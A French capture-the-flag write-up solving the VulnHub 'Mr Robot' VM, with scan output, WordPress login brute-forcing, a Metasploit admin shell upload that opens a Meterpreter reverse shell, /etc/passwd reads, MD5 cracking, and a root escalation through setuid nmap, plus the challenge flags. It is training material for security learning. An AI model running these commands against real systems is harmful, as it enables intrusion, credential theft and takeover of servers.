# Wordpress p0wn challenge

Ce TP était centré sur une VM vulnérable disponible sur Root Me et VulnHub. N'oubliez pas que ce sont que des challenges de sécurité. Il a pour ut la montée en compétences d'abord, au détriment de la proximité avec ce qu'on trouve dans la réalité (mais y'a quand même des trucs réels, ça entraîne à avoir les bons réflexes).

Le but de ce genre de challenges est de trouver un "flag" : un mot de passe qui indique qu'on a trouvé la vulnérabilité ou l'élément faillible.

On récupère le `.ova` lié à l'épreuve sur https://www.vulnhub.com/entry/mr-robot-1,151/ et on l'importe dans VBox.

Puis on start la VM.

Pour réaliser les attaques, on va utiliser une VM Kali pour profiter de tous les outils pré-installés.

<!-- vim-markdown-toc GitLab -->

* [Footprinting](#footprinting)
* [Bruteforce Wordpress](#bruteforce-wordpress)
* [Wordpress + Metasploit](#wordpress-metasploit)
* [Local Footprinting](#local-footprinting)
* [Where is root ?](#where-is-root-)

<!-- vim-markdown-toc -->

## Footprinting

On trouve l'IP de la cible :

```bash
it4@kal:~$ nmap -sP 192.168.56.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 07:50 EDT
Nmap scan report for 192.168.56.1   # ma machine hôte
Host is up (0.0012s latency).
Nmap scan report for 192.168.56.59  # la cible
Host is up (0.0073s latency).
Nmap scan report for 192.168.56.60  # la machine Kali
Host is up (0.00050s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 15.44 seconds
```

On scanne la cible pour détecter les ports ouverts :

```bash
it4@kal:~$ nmap -A 192.168.56.59
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 07:54 EDT
Nmap scan report for 192.168.56.59
Host is up (0.0055s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.93 seconds
```

On voit que les ports 80 et 443 sont ouverts. Petit serveur Web Apache. On a pas sa version, mais ça vaut le coup d'aller regarder.

On test de requêter l'application, juste pour voir :

```bash
it4@kal:~$ curl -k https://192.168.56.59
<!doctype html>
<!--
\   //~~\ |   |    /\  |~~\|~~  |\  | /~~\~~|~~    /\  |  /~~\ |\  ||~~
 \ /|    ||   |   /__\ |__/|--  | \ ||    | |     /__\ | |    || \ ||--
  |  \__/  \_/   /    \|  \|__  |  \| \__/  |    /    \|__\__/ |  \||__
-->
<html class="no-js" lang="">
  <head>


    <link rel="stylesheet" href="css/main-600a9791.css">

    <script src="js/vendor/vendor-48ca455c.js"></script>

    <script>var USER_IP='208.185.115.6';var BASE_URL='index.html';var RETURN_URL='index.html';var REDIRECT=false;window.log=function(){log.history=log.history||[];log.history.push(arguments);if(this.console){console.log(Array.prototype.slice.call(arguments));}};</script>

  </head>
  <body>
    <!--[if lt IE 9]>
      <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>


    <!-- Google Plus confirmation -->
    <div id="app"></div>


    <script src="js/s_code.js"></script>
    <script src="js/main-acba06a5.js"></script>
</body>
</html>
```

"You are not alone". Hahaha, comprendront ceux qui ont vu la série Mr. Robot.

On continue le footprinting en se concentrant sur l'appli Web. `nikto` est notre ami.

```bash
it4@kal:~$ nikto --Display on --host 192.168.56.59
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.59
+ Target Hostname:    192.168.56.59
+ Target Port:        80
+ Start Time:         2020-04-08 08:00:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.56.59/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-08 08:20:55 (GMT-4) (1233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

Ow. Plein de trucs intéressants :
* on a un Wordpress qui tourne dans `/wordpress`
* y'a pas mal de paths intéressants qui ont été détectés : `/admin`, `/wp-login`, `/wordpress`, `/wp-login`, etc.

Vu que `nikto` nous a montré une install de Worpress, on va continuer le footprinting dans ce sens là.

```bash
it4@kal:~/robot$ wpscan --url 192.168.56.59
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://192.168.56.59/
[+] Started: Wed Apr  8 08:44:21 2020

Interesting Finding(s):

[+] http://192.168.56.59/
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.59/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.56.59/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.59/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.59/cbbe5e1.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.59/cbbe5e1.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.168.56.59/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-02-25T00:00:00.000Z
 | Readme: http://192.168.56.59/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.56.59/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.59/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Apr  8 08:44:36 2020
[+] Requests Done: 52
[+] Cached Requests: 6
[+] Data Sent: 11.115 KB
[+] Data Received: 227.977 KB
[+] Memory used: 172.977 MB
[+] Elapsed time: 00:00:15
```

Plein plein de trucs : on va commencer par le `robots.txt` :

```bash
it4@kal:~$ curl 192.168.56.59/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
```

Hé salut. On va récupérer ces deux fichiers.

```bash
it4@kal:~$ mkdir robot
it4@kal:~$ cd robot/
it4@kal:~/robot$ curl -SLO 192.168.56.59/fsocity.dic
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 7075k  100 7075k    0     0   9.8M      0 --:--:-- --:--:-- --:--:--  9.8M
it4@kal:~/robot$ curl -SLO 192.168.56.59/key-1-of-3.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    33  100    33    0     0   2200      0 --:--:-- --:--:-- --:--:--  2200

it4@kal:~/robot$ cat key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9 # première partie du flag

it4@kal:~/robot$ cat fsocity.dic | wc -l # le fichier est un dictionnaire de nom, mots de passe, etc utile pour du bruteforce
858160
```

> Bon c'est pas très réalite de trouver un dictionnaire dans le site web, mais c'est assez réaliste d'avoir des infos exploitables dans le `robots.txt`.

**C'est un vieux Wordpress. On va l'exploser.**

## Bruteforce Wordpress

On utilise un p'tit script pour récup un username valide en bruteforce. Les options :
* `url` : URL du wp-login du Wordpress
* `wordlist` : dictionnaire à utilsier pour le bruteforce
* `false` : morceau de sting retourné si le test est faux
  * par exemple, dans Wordpress, quand on saisit un mauvais user, une string est retournée : "Invalid username <USERNAME>"

```bash
it4@kal:~/robot$ python2 brute.py --url http://192.168.56.59/wp-login.php --wordlist ./fsocity.dic  --false "Invalid username"
Found a valid login with : Elliot
```

Puis un autre pour trouver son password :
```bash
it4@kal:~/robot$ python2 brutepw.py --false "The password you entered for the username"  --url http://192.168.56.59/wp-login.php --wordlist ./fsocity.dic -l Elliot
Found a valid login with : ER28-0652
```

Le bruteforce du password prend du temps car le bon mot de passe est quasi touuuut à la fin du dictionnaire (quelle bande de malandrins) :

```bash
it4@kal:~/robot$ awk '/ER28-0652/{ print NR; exit }' fsocity.dic 
858151  # numéro de ligne du password
it4@kal:~/robot$ cat fsocity.dic | wc -l
858160  # nombre total de lignes dans le dictionnaire
```

Mais bon on a notre user `Elliott` et notre password `ER28-0652`. Avec ce user, on peut se co sur le Wordpress dans la partie Admin et surprise, le user trouvé est admin.

Let's have some fun with `metasploit`.

## Wordpress + Metasploit

Let's launch Metasploit. On va utiliser un epxloit assez connu pour les vieux wordpress. Utilisable une fois qu'on a un user et un password admin valides.

```bash
it4@kal:~/robot$ msfconsole 
msf5 > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WordPress



msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ER28-0652
PASSWORD => ER28-0652
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.59
RHOSTS => 192.168.56.59
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME Elliot
USERNAME => Elliot
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set WPCHECK false
WPCHECK => false
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.60:4444 
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/RghIYJhgHw/AFVBaMQbOi.php...
[*] Sending stage (38288 bytes) to 192.168.56.59
[*] Meterpreter session 1 opened (192.168.56.60:4444 -> 192.168.56.59:48882) at 2020-04-08 11:05:36 -0400
[!] This exploit may require manual cleanup of 'AFVBaMQbOi.php' on the target
[!] This exploit may require manual cleanup of 'RghIYJhgHw.php' on the target
[!] This exploit may require manual cleanup of '../RghIYJhgHw' on the target

meterpreter > ls
Listing: /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins/RghIYJhgHw
=========================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  1114  fil   2020-04-08 13:05:35 -0400  AFVBaMQbOi.php
100644/rw-r--r--  138   fil   2020-04-08 13:05:35 -0400  RghIYJhgHw.php
```

We got a shell ! Maintenant qu'on a un shell sur la machine, on reprend le footprinting, mais cette fois, en local :)

## Local Footprinting

Let's go.

Liste des users de la machine :

```bash
meterpreter > shell

/usr/bin/id  # Utilisateur courant
uid=1(daemon) gid=1(daemon) groups=1(daemon)

cat /etc/passwd # Liste des utilisateurs de la machine
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:
```

Y'a un user `robot` qui peut être intéressant. Allons voir de plus près.

```bash
ls -al /home/robot
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```

La clé n'est pas lisible. En revanche le password l'est, enfin, son hash (pourri) en MD5.

Un petit tour sur `www.crackstation.net` et on récupère le mot de passe en clair : `abcdefghijklmnopqrstuvwxyz`.

Allez, on se log avec le user :

```bash
su - robot
su: must be run from a terminal
```

Ha fuck it. Le meterpreter spawn un shell mais sans s'accrocher à un terminal. Petit trick python pour pop un terminal et y attacher un shell : 
```bash
python -c "import pty; pty.spawn('/bin/bash')"
<ps/wordpress/htdocs/wp-content/plugins/suJpeWPyzT$ 

<ps/wordpress/htdocs/wp-content/plugins/suJpeWPyzT$ id -un
id -un
daemon

<ps/wordpress/htdocs/wp-content/plugins/suJpeWPyzT$ su - robot

$ ls
ls
key-2-of-3.txt	password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
```

Yipi, la deuxième partie du flag.

## Where is root ?

Une méthode connue pour obtenir + de droits sur une machine est de chercher les binaires qui sont setuid. Une commande find peut faire l'affaire pour ça.

```bash
$  find / -user root -perm -4000 2>&1 | grep -v denied
 find / -user root -perm -4000 2>&1 | grep -v denied
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
```

Ha. Bah oilà. `nmap` est setuid root. Ca sent la victoire.
```bash
$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
```

And it is dooone.
